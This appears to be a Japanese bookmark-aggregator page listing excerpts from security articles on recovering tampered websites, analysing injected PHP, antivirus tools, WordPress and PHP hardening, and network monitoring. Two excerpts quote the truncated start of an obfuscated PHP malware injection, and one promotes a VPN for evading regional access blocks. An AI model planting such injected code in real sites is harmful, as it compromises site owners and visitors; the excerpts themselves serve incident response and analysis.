脆弱性を突かれて Web サイトを改ざんされてウィルス呼び出しコードを埋めこまれたファイルの調べ方と除去と対応作業と申請手続きについて
改ざんされてウィルス配布コード埋めこまれてから復旧までの作業や申請の手続きについてまとめていきます。 追記: 「改ざんされた場合そのものの対処方法」という意味で書かせて頂きました。phpMyAdmin の脆弱性についてではなく全般的な内容となっております。誤解を与える表現となってしまい申し訳御座いません。 今回埋めこまれた不正なコード 実際のコードは改行やスペースがなくなって一行のコードとなっておりますので非常に気づきにくいです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
そらいさんのサイトが改竄されたそうなので解析してみた
そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL
ウイルス感染したWin機をUSBからブートできる『Windows Defender』 | ライフハッカー・ジャパン
Windowsには『Microsoft Security Essentials』という優れたセキュリティツールがありますが、更新しそこねたタイミングで、運悪くウイルスに感染してしまったときはどうしたらいいのでしょうか? そんな「まさか!」のときの復旧ソリューションとして、オフライン状態でUSBから『Windows Defender』を立ち上げるという方法があります。 起動可能なUSBを作成するには、起動中のWindowsが必要なので、ウイルス感染に備えて、事前に立ち上げ用のUSBを作っておくのがオススメ。「もう感染しちゃった...」という場合は、他のWindowsマシンを借りましょう。 Windowsさえあれば、作成プロセスはとてもシンプル。こちらのMicrosoft公式ページからダウンロードして実行すれば、あとは画面に従ってクリックするだけです。詳しくは、テック系ブログ「How-To G
トラブルをわざと発生させサーバ問題解決能力を鍛える「Trouble-Maker」 - GIGAZINE
ほとんどのシステム管理者が経験したことがあるはずの状況は「何か悪いことが起きていて、サーバがダウンしているが、しかし何が起きているのか分からない」というシチュエーション。サーバを管理するシステムアドミニストレーターなどの立場でいると何が大変かというと、実際の製品として動かしている実環境でこのような問題が発生した場合です。 そこで役に立つのがこのオープンソースソフト「Trouble-Maker」です。 Trouble-Maker http://trouble-maker.sourceforge.net/ システム管理者の仕事を簡単にするため、多くのツールが存在していますが、未知の状況を経験している場合になんとかしてくれるわけではありません。この一連のソフトウェア群「Trouble-Maker」は既存の便利なツールとは異なり、問題を解決するのではなく、むしろ問題を引き起こします。インストールし
2011年10月時点で最強のアンチウイルスソフトが決定 - GIGAZINE
by ERICA☮ ウイルス対策ソフトの動作検証を行っている第三者機関「AV-Comparatives.org」が、20種類のアンチウイルスソフトの検出力、誤検出数についてのレポートを発表しました。 AV-Comparatives.orgはこのテストに関する権威であり、このテストで「ADVANCED+」として表彰されたソフトであれば使っていて安心できるといえます。今回のテストでは20種類のうち、10種類が「ADVANCED+」に選ばれています。 (PDFファイル)AV-Comparatives - Detection Tests On-Demand Comparative August 2011 今回のテストに用いられたアンチウイルスソフトは以下の20本。 ・avast! Free Antivirus 6.0.1203 ・AVG Anti-Virus Free Edition 10.0.1
WordPressのセキュリティ対策
1. WordCamp Yokohama 2010 @LT WordPressのセキュリティ対策 WordPressのセキュリティ対策 2010年 5月29日 株式会社 神戸デジタル・ラボ 堀家 隆弘 (horike@kdl co jp) horike@kdl.co.jp horike@kdl.co.jp) jp) 株式会社神戸デジタル・ラボ 1 Copyright © 2010. Kobe Digital Labo Inc. ,Ltd. All rights reserved. 2. 本日のアジェンダ 1. 神戸デジタル ラボ (KDL) 1 神戸デジタル・ラボ (KDL) のご紹介 2. オープンソースのセキュリティ 3. WordPressへの攻撃事例 WordPressへの攻撃事例 4. WordPressのセキュリティ対策 4 WordPressのセキュリティ対策 株式会社神戸デ
WordPressのログインURL(wp-login.php)をサクッと変更できるプラグイン・Stealth Loginでプチセキュリティ強化 - かちびと.net
WordPressのログインURLは何もしなければ 知っている方にはバレバレです。個人サイト なら気になりませんが、納品物だと少し不安 ではあるかなと思います。URLを変更するには .htaccessを触る必要がありますが、ハードル が高かったりして手を出せない方もいるかと思 います。 少し前にWordPressを使ってWeb制作をする為の手順リストっていう記事を書いたんですが、この中で紹介したプラグインが便利なのにまだ知名度が低い印象なので改めてご紹介。 WordPressで構築されているサイトのログインURLは基本的にhttp://domain.com/wp-login.phpで共通なので、知ってる人にはバレバレ。これはちょっと気持ち悪いので変更したいところです。 変えるには.htaccessにrewriteコードを追記するんですが、慣れていないと若干ハードルが高い印象です。これを、直
TCPEye
TCPEye は PC の通信情報をリアルタイムで表示するモニタリングソフト ローカル PC が現在通信中のすべての TCP/IP および UDP ポートのリストを一覧で表示。 表示プロセスは、通信先のアドレス、通信プロトコル、国籍(国旗表示)、プロセスパス(例:C:\Program File\…)、プロダクト名、会社名、ファイル概要、ファイルバージョン等が表示されます。 プロセスを選択して右クリックすると、プロセスの終了やプロセス情報のコピー(クリップボード)、 VirusTotal を使ってのウィルススキャン、 Whois IP(通信先のホスト情報調査)、GetIP Tool(通信先ホストの所在地調査)を行うことができます。 この他、取得した情報をテキストで保存、通信情報取得更新時間の変更(デフォルト1秒)、ポップアップでの通信ステータス変更通知、通信ステータス変更をサウンドで通知等の
タブや画面分割で快適に利用可能なSSHクライアント「Poderosa」
専用サーバや各種クラウド、VPSなどを有意義に使い倒すには、専用のコントロールパネルを使うだけでなく、やはり細かいことをするためにもSSHによる接続は避けて通れません。TeraTermやPuttyといったパワフルなものもいいのですが、サクっと複数サーバに同時接続してコマンドを打つ程度であれば、今まで使ってきた経験上、この「Poderosa」で十分でした。Windows用なのですが、GIGAZINEの管理などにも使っており、かなりお気に入りです。 index - Terminal Emulator Poderosa http://ja.poderosa.org/index.html ◆インストール 上記ページからダウンロードしたインストーラを起動 「次へ」をクリック 「同意する」にチェックを入れて「次へ」をクリック 「次へ」をクリック 「次へ」をクリック 「次へ」をクリック 「インストール」
日本を拒否するムカつく海外サイトは「Hotspot Shield」で突破 :教えて君.net
海外のウェブサービスにはヨダレもののお宝ファイルがたくさんある。だが最近は日本での人気が高まりすぎて、日本からのアクセスを遮断してしているサービスが意外に多い。せっかく便利に使っていたのに許せん! IPアドレスを偽装して日本以外からのアクセスに見せかけ、規制されているウェブサービスを使い倒そう! ■日本を拒否するムカつく超便利サイト! インターネットラジオサービス「PANDORA」。日本での人気が出始めたくらいに、米国以外からのアクセスが禁止された。サイトへアクセスするとページすら表示されない ■VPN裏活用で規制を回避せよ! 日本からのアクセスが禁止されているサイトにアクセスするには、「Hotspot Shield」を使うのが便利だ。本来は「VPN」という技術を使って無線LANなどの暗号化が十分にされてない環境からネットを安全に見るためのツールだが、利用すると自分のIPアドレスが米国のも
パフォーマンス改善やセキュリティに役立つ.htaccessの設定 | コリス
ウェブサイトのパフォーマンスの改善やSEO、セキュリティに役立つ.htaccessの設定を紹介します。 17 Useful Htaccess Tricks and Tips 備考:Apache チュートリアル: .htaccess ファイル、Apache コア機能 [ad#ad-2] .htaccessの設定:パフォーマンスやSEO関連 .htaccessの設定:セキュリティ関連 .htaccessの設定:パフォーマンスやSEO関連 .htaccessでタイムゾーンを設定 .htaccessでタイムゾーンを設定します。 例:東京 SetEnv TZ JST-9 もしくは、 SetEnv TZ Asia/Tokyo .htaccessで301リダイレクトを設定 .htaccessで301リダイレクト(永続的なリダイレクト)を設定します。 例:旧ファイル(old.html)、新ファイル(new
レガシーPHPのセキュリティ対策、大丈夫ですか? 記事一覧 | gihyo.jp
運営元のロゴ Copyright © 2007-2024 All Rights Reserved by Gijutsu-Hyoron Co., Ltd. ページ内容の全部あるいは一部を無断で利用することを禁止します。個別にライセンスが設定されている記事等はそのライセンスに従います。
PHP と Web アプリケーションのセキュリティについてのメモ
このページについての説明・注意など PHP は、Apache モジュールや、CGI、コマンドラインとして使用できるスクリプト言語です。このページでは、主に PHP における、Web アプリケーションのセキュリティ問題についてまとめています。 Web アプリケーションのセキュリティ問題としては、以下の問題についてよく取り挙げられていると思いますが、これらのセキュリティ問題について調べたことや、これら以外でも、PHP に関連しているセキュリティ問題について知っていることについてメモしておきます。 クロスサイトスクリプティング SQL インジェクション パス・トラバーサル(ディレクトリ・トラバーサル) セッションハイジャック コマンドインジェクション また、PHP マニュアル : セキュリティや、PHP Security Guide (PHP Security Consortium) には、PH
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
起動不能のOSをウイルスチェック・復旧する「Windows Defender Offline」ベータ版NOT SUPPORTED
プロセスが行う外部との通信を一覧表示できるネットワーク監視ソフト「TCPEye」NOT SUPPORTED